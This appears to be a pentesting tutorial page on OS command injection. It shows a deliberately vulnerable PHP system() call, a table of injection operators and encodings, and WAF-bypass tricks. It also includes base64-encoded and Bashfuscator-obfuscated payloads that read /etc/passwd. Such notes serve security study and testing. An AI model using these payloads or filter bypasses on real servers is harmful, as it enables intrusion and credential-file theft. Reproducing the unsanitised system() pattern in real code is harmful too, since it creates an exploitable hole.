Command Injections

Execute system commands on the back-end server

There are serveral type of injections foundin web apps. The most common are:

Injection
Description

OS Command Injection

User input is used as part of an OS command.

Code Injection

User input is used within a function that evaluates code.

SQL Injection

User input is used as part of an SQL query.

XSS/HTML Injection

User input is displayed on a web page.

OS Command Injections

With OS command injections the user input must go into a web query that is executing system commands. Therefore look for function in programming languages that execute system commands.

PHP

web application written in PHP may use the exec, system, shell_exec, passthru, or pope . 

<?php
if (isset($_GET['filename'])) {
    system("touch /tmp/" . $_GET['filename'] . ".pdf");
}
?>

Here touch is executed but without sanitation making it vulernable.

Detection

Finding out wether input is vulnerable for command injection

Semicolon

;

%3b

Both

New Line

\n

%0a

Both

Background

&

%26

Both (second output generally shown first)

Pipe

|

%7c

Both (only second output is shown)

AND

&&

%26%26

Both (only if first succeeds)

OR

||

%7c%7c

Second (only if first fails)

Sub-Shell

``

%60%60

Both (Linux-only)

Sub-Shell

$()

%24%28%29

Both (Linux-only)

Bypassing Front-End validation

It can happen input is only validated on the front-end and not on the back-end. To bypass front-end validation we can url encode for example.

We can use && to chain commands

ping -c 1 127.0.0.1 && whoami

Or use the OR (||) operator which only executes the second command if the first command fails to execute.

Other operators

SQL Injection

' , ; -- /* */

Command Injection

; &&

LDAP Injection

* ( ) & |

XPath Injection

' or and not substring concat count

OS Command Injection

; & |

Code Injection

' ; -- /* */ $() ${} #{} %{} ^

Directory Traversal/File Path Traversal

../ ..\\ %00

Object Injection

; & |

XQuery Injection

' ; -- /* */

Shellcode Injection

\x \u %u %n

Header Injection

\r %0d %0a %09

Filter/WAF Detection

Web applications may use a WAF which has a list of blacklisted characters. Try various chars to see which are not blocked. For spaces filter:

Spaces blacklisted can be bypassed various ways:

  • Tabs = %09

  • IFS = ${IFS}

  • Brace expansions = {ls,-la}

Other solution is to use path for / here.

echo ${PATH:0:1}
/

Or a semcolon:

echo ${LS_COLORS:10:1}
;

Or encode with base64

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

We can utilize for obfuscating bash commands Bashfuscator. 

$ /bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

[+] Mutators used: Token/ForCode
[+] Payload:
eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"
[+] Payload size: 104 characters

Last updated

Was this helpful?